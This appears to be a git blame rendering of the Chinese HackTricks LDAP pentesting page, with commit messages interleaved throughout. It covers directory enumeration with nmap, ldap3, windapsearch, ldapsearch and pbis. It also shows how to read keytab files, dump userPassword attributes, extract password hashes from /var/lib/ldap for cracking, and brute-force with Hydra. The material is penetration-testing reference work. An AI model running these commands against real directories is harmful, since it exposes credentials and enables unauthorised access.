										
											2022-10-05 21:51:12 +00:00
 								[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
+								```bash
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								pip3 install ldapdomaindump
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### [暴力破解](../generic-methodologies-and-resources/brute-force.md#ldap)
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 枚举
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 自动化
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								使用此方法，您将能够查看**公共信息**（如域名）**：**
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```bash
 								nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
 								```
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								### Python
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								<details>
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								<summary>查看使用 Python 进行 LDAP 枚举</summary>
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								您可以尝试**使用或不使用凭证通过 Python 枚举 LDAP**：`pip3 install ldap3`
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								首先尝试**不使用**凭证连接：
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```bash
 								>>> import ldap3
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
 								>>> connection = ldap3.Connection(server)
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								>>> connection.bind()
 								True
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								>>> server.info
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								如果响应是`True`，如前面的例子所示，你可以从以下位置获取LDAP（如**命名上下文**或**域名**）服务器的一些**有趣数据**：
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								```bash
 								>>> server.info
 								DSA info (from DSE):
 								Supported LDAP versions: 3
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Naming contexts:
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								dc=DOMAIN,dc=DOMAIN
 								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								```markdown
 								一旦你有了命名上下文，你就可以进行一些更加令人兴奋的查询。这个简单的查询应该会显示目录中的所有对象：
 								```
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								```bash
 								>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
 								True
 								>> connection.entries
 								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								或者**导出**整个ldap：
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```bash
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
 								True
 								>>> connection.entries
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								</details>
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								### windapsearch
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								[**Windapsearch**](https://github.com/ropnop/windapsearch) \*\*\*\* 是一个 Python 脚本，通过使用 LDAP 查询，可以有效地从 Windows 域中**枚举用户、组和计算机**。
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```bash
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								# Get computers
 								python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
 								# Get groups
 								python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
 								# Get users
 								python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
 								# Get Domain Admins
 								python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
 								# Get Privileged Users
 								python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
-												GitBook: [#3559] No subject

											
										
										
											2022-10-04 23:49:59 +00:00
+								```
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								### ldapsearch
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								检查空凭证或您的凭证是否有效：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
 								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
 								```bash
-												fix mess 2

											
										
										
											2022-05-01 12:49:36 +00:00
+								# CREDENTIALS NOT VALID RESPONSE
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								search: 2
 								result: 1 Operations error
 								text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								tion a successful bind must be completed on the connection., data 0, v3839
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								如果你发现某些内容显示“_bind must be completed_”意味着凭证不正确。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								你可以使用以下方法从一个域中提取**所有信息**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								-x Simple Authentication
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								-H LDAP Server
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								-D My User
 								-w My password
 								-b Base site, all data from here will be given
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								提取**用户**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
 								#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								提取**computers**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								提取**我的信息**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								提取 **Domain Admins**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								提取**域用户**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								提取 **Enterprise Admins**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								提取**管理员**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								提取 **Remote Desktop Group**：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												Fix ldapsearch command syntax
											
										
										
											2022-07-13 14:08:05 +00:00
+								ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								要查看您是否有权访问任何密码，您可以在执行其中一个查询后使用 grep：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
 								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								请注意，您在这里找到的密码可能不是真实的密码...
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								#### pbis
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								您可以从这里下载 **pbis**：[https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/)，通常安装在 `/opt/pbis`。\
 								**Pbis** 允许您轻松获取基本信息：
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
+								```bash
-												GitBook: [master] one page modified
											
										
										
											2021-01-19 17:57:39 +00:00
+								#Read keytab file
 								./klist -k /etc/krb5.keytab
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
+								#Get known domains info
 								./get-status
 								./lsa get-status
 								#Get basic metrics
 								./get-metrics
 								./lsa get-metrics
 								#Get users
 								./enum-users
 								./lsa enum-users
 								#Get groups
 								./enum-groups
 								./lsa enum-groups
 								#Get all kind of objects
 								./enum-objects
 								./lsa enum-objects
 								#Get groups of a user
 								./list-groups-for-user <username>
 								./lsa list-groups-for-user <username>
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 00:15:17 +00:00
+								#Get groups of each user
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
+								./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
 								#Get users of a group
 								./enum-members --by-name "domain admins"
 								./lsa enum-members --by-name "domain admins"
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 00:15:17 +00:00
+								#Get users of each group
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
+								./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
 								#Get description of each user
 								./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								echo "$line";
 								./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
 								echo "======================"
-												GitBook: [master] 12 pages and 24 assets modified
											
										
										
											2021-01-06 00:08:54 +00:00
+								done
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 图形界面
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								### Apache Directory
-												GitBook: [master] one page modified
											
										
										
											2020-09-13 20:20:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								[**从这里下载 Apache Directory**](https://directory.apache.org/studio/download/download-linux.html)。你可以在[这里找到如何使用这个工具的示例](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s)。
-												GitBook: [master] one page modified
											
										
										
											2020-09-13 20:20:14 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								### jxplorer
-												GitBook: [master] one page modified
											
										
										
											2020-09-13 20:20:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								你可以在这里下载带有 LDAP 服务器的图形界面：[http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								默认安装在：_/opt/jxplorer_
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3523] No subject

											
										
										
											2022-09-30 10:43:59 +00:00
+								![](<../.gitbook/assets/image (22) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								### Godap
 								你可以在[https://github.com/Macmod/godap](https://github.com/Macmod/godap)访问它
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								## 通过 kerberos 进行认证
 								使用 `ldapsearch`，你可以通过 `-Y GSSAPI` 参数**使用 kerberos 进行认证**，而不是通过 **NTLM**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## POST
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								如果你能访问包含数据库的文件（可能在 _/var/lib/ldap_ 中）。你可以使用以下方法提取哈希：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
 								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								您可以将密码哈希（从 '{SSHA}' 到 'structural'，不添加 'structural'）提供给john。
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
 								### 配置文件
 								* 通用
 								* containers.ldif
 								* ldap.cfg
 								* ldap.conf
 								* ldap.xml
 								* ldap-config.xml
 								* ldap-realm.xml
 								* slapd.conf
 								* IBM SecureWay V3 服务器
 								* V3.sas.oc
 								* Microsoft Active Directory 服务器
 								* msadClassesAttrs.ldif
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								* Netscape Directory Server 4
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								* nsslapd.sas\_at.conf
 								* nsslapd.sas\_oc.conf
 								* OpenLDAP 目录服务器
 								* slapd.sas\_at.conf
 								* slapd.sas\_oc.conf
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								* Sun ONE Directory Server 5.1
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								* 75sas.ldif
-												HAC ldap
											
										
										
											2021-08-12 13:06:00 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## HackTricks 自动命令
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												HAC ldap
											
										
										
											2021-08-12 13:06:00 +00:00
+								Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
 								Port_Number:  389,636     #Comma separated if there is more than one.
 								Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out
-Yaml
											
										
										
											2021-08-15 17:52:05 +00:00
+								Entry_1:
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Name: Notes
 								Description: Notes for LDAP
 								Note: |
 								LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP).
-Yaml
											
										
										
											2021-08-15 17:52:05 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								https://book.hacktricks.xyz/pentesting/pentesting-ldap
-Yaml
											
										
										
											2021-08-15 17:52:05 +00:00
 								Entry_2:
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Name: Banner Grab
 								Description: Grab LDAP Banner
 								Command: nmap -p 389 --script ldap-search -Pn {IP}
-Yaml
											
										
										
											2021-08-15 17:52:05 +00:00
 								Entry_3:
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Name: LdapSearch
 								Description: Base LdapSearch
 								Command: ldapsearch -H ldap://{IP} -x
-Yaml
											
										
										
											2021-08-15 17:52:05 +00:00
 								Entry_4:
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Name: LdapSearch Naming Context Dump
 								Description: Attempt to get LDAP Naming Context
 								Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
-Yaml
											
										
										
											2021-08-15 17:52:05 +00:00
 								Entry_5:
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Name: LdapSearch Big Dump
 								Description: Need Naming Context to do big dump
 								Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
-												GitBook: [master] 19 pages and 4 assets modified
											
										
										
											2021-09-25 16:33:43 +00:00
-												Update pentesting-ldap.md
											
										
										
											2021-09-13 15:45:07 +00:00
+								Entry_6:
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								Name: Hydra Brute Force
 								Description: Need User
 								Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
-												HAC ldap
											
										
										
											2021-08-12 13:06:00 +00:00
+								```
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								* 您是否在**网络安全公司**工作？您是否希望在**HackTricks中看到您的公司广告**？或者您是否想要访问**PEASS的最新版本或以PDF格式下载HackTricks**？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
 								* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs集合**](https://opensea.io/collection/the-peass-family)
 								* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
 								* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
 								* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>